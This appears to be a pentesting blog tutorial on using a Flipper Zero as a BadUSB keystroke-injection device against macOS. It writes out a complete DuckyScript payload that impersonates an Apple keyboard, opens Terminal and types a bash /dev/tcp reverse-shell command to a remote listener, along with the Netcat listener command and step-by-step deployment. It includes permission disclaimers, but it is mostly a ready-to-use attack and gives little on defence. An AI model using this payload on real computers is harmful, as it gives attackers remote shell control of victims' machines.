Using a Flipper Zero, a short 12-line DuckyScript text file, and a remote listener on my Ubuntu server I was able to gain a shell on my fully patched, up-to-date Ventura macOS computer. In my lab environment, I use Flipper Zero as a pentesting device to test vulnerabilities in my servers and desktop systems. The Flipper Zero is our preferred ethical hacking tool because it offers an endless number of available payloads, has an on-screen menu selection tool, and uses a progress display to provide feedback. This article is an example of how to use the Flipper Zero as an Ethical Pentesting BadUSB device and how to avoid becoming a victim of such an exploit. Do not use this on computers that you do not own or have permission to use. This code does not make an effort to hide from Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Network Detection Systems, Firewalls, or Anti-Virus (AV) software. BadUSB Payloads The Flipper Zero BadUSB as well as several other BadUSB devices use payloads written in DuckyScript. A simple scripting language for performing keystrokes resulting in a keyboard injection attack. A good starting reference point for Duckyscript Payloads is the Official Hak5 website: . Here you will find examples and documentation for using DuckScript. https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky Let’s Write Some DuckyScript You can use a ready-made script, or you can learn to write your own. We’ll show you how to exploit a reverse shell on a macOS computer in a simple step-by-step walkthrough. Use your favorite text editor and enter the following text. The macOS has the TextEdit application installed by default, so we’ll use that. ID 05ac:021e Apple:Keyboard DELAY 1000 GUI SPACE DELAY 200 STRING terminal DELAY 200 ENTER DELAY 1000 STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 DELAY 1000 ENTER DELAY 1000 For this walkthrough we don’t need to know a lot about DuckyScript, so we’ll go over the few commands that our script uses. There are really only six different commands that we use. Command Description ID 05ac:021e Apple:Keyboard This line tells the macOS our Flipper Zero is really an Apple Keyboard. If you do not use this line, the macOS displays the Keyboard Setup Assistant dialog which will cause your script to fail. DELAY This command instructs the operating system to wait for a period of time. If we don’t use these delays, the script will run too fast and fail. GUI SPACE Presses the Apple Command key and the Space bar to open the ‘Spotlight Search’ window. STRING Terminal Enters the string ‘Terminal’ into the Spotlight Search window ENTER Presses the ENTER or Return key on your keyboard. After pressing the ENTER key, the macOS launches the Terminal window (/Applications/Utilities/Terminal) STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 This command enters the text into the terminal window which establishes a connection to the Netcat server listening at 10.10.10.157 on Port 4444 Change the IP address at and Port to your server’s IP address and port. 10.10.10.157 4444 Save this file to your disk as . There is no subdirectory organization under the directory on the Flipper Zero so if you are using multiple payloads for different operating systems, use a naming convention that means something to you so you know what it does. rev_shell_macos.txt badusb Installing the qflipper Application If you haven’t installed the qflipper application yet, go to the Official Flipper Zero update page and select the installer for your operating system. The page is the firmware update page, but at the bottom are links to install the qflipper application. https://flipperzero.one/update https://flipperzero.one/update?embedable=true Follow the instructions for your operating system to install the qflipper application. Getting the Duckyscript Onto the Flipper Zero Open the qflipper application and select the folder icon highlighted in red. Select and double-click the icon to view the contents. SD Card Locate and drag the file we created earlier onto the folder. rev_shell_macos.txt badusb Remove the Flipper Zero from your computer when the file is done copying. Waiting for a Reverse Shell The Flipper Zero BadUSB is armed and ready to use. But first, we need to set up our remote listener on our server. On our Ubuntu server, start the Netcat listener with the following command: $ nc -nlvp 4444 The breakdown of the command is listed in the following table. Again you don’t really need to know what’s going on using this command, other than it’s waiting for an incoming connection. Command Description nc Netcat command -nlvp ( ) no DNS resolution, ( ) listen for incoming connection, ( ) verbose output, ( ) port n l v p 4444 Port number to listen on Now that our Netcat listener is ready and waiting for an incoming connection, we can proceed with the Flipper Zero BadUSB attack. Starting the BadUSB Reverse Shell The hard part is done. The Flipper Zero BadUSB file is written, moved to the Flipper Zero, and the Netcat listener is waiting for a connection. reverse_shell_macos.txt Locate the Bad USB menu and select the Run button. Do not connect your Flipper Zero to your computer just yet. The Flipper Zero will let you know when it’s time to connect your device. Navigate to the DuckyScript file we copied in the previous step. If you don’t see this file then you copied it to the wrong directory or did not use the .txt filename extension. Select and click the Run button. rev_shell_macos When you see the alert, you can connect your Flipper Zero to your iMac or MacBook’s USB port. Click the Run button. Connect to USB You can watch the progress of your BadUSB script in the main window. Once the status reaches 100% the payload is complete and you can remove the Flipper Zero. If you are watching the iMac’s computer’s monitor you can see the exploit as it executes the DuckyScript. The Netcat listener on our Ubuntu server displays the results of the successful request. Control of your Computer You now have control of the macOS computer through a reverse shell. Running on a version of BSD Linux, you can use Unix command line tools and a BASH shell as if you were sitting at the physical iMac’s keyboard. You can use regular Linux commands like , , , or to navigate the filesystem and manipulate the operating system. whoami pwd ls cd Next Steps Now that you have an understanding of how the Flipper Zero operates as a BadUSB device you can create your own scripts. Use the Hak5 site or one of the many DuckyScript GitHub repositories available through a Google search as a starting point for your own Duckyscript files. Operate legally and ethically. Use this tool on devices that you own or have permission to use.
